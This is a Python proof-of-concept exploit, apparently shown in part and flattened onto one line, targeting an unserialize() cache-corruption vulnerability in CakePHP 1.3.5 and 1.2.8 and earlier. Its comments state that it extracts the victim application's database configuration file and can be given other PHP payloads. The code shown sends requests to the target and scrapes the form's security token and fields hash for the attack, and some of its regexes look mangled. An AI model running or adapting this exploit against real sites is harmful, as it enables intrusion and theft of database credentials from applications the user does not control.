#!/usr/bin/python # # burnedCake.py - CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit # written by [email protected] # # This code exploits a unserialize() vulnerability in the CakePHP security # component. See http://malloc.im/CakePHP-unserialize.txt for a detailed # analysis of the vulnerability. # # The exploit should work against every CakePHP based Application, that # uses POST forms with security tokens and hasn't changed the Cache # configuration (file-system caching is standard). Exploiting # other caching configurations is possible but not as elegant. # # This POC will output the database config file of the running CakePHP Application, # other payloads are easily possibe with a changed PHP Code. from optparse import OptionParser from urlparse import urlparse,urljoin import urllib2 import urllib import re def request(url,data="",headers={},debug=0): if (data==""): request = urllib2.Request(url=url,headers=headers) else: request = urllib2.Request(url=url,headers=headers,data=data) debug_handler = urllib2.HTTPHandler(debuglevel = debug) opener = urllib2.build_opener(debug_handler) response=opener.open(request) return response if __name__=="__main__": parser = OptionParser(usage="usage: %prog [options] url") parser.add_option("-p", "--post", dest="post", help="additional post content as urlencoded string") parser.add_option("-v", action="store_true", dest="verbose", help="verbose mode") (options, args) = parser.parse_args() if len(args)!=1: parser.error("wrong number of arguments") if options.verbose: debug=1 else: debug=0 if not options.post: options.post="" url=urlparse(args[0]) html=request(url.geturl(),debug=debug ).read() try: key=re.search("data/[_Token/]/[key/]/" value=/"(.*?)/"",html).group(1) path=re.search('method="post" action="(.*?)"',html).group(1) fields=re.search('data/[_Token/]/[fields/]" value="([0-9a-f]{32}).*?"',html).group(1) except: print "[x] Regex failed! :(" exit()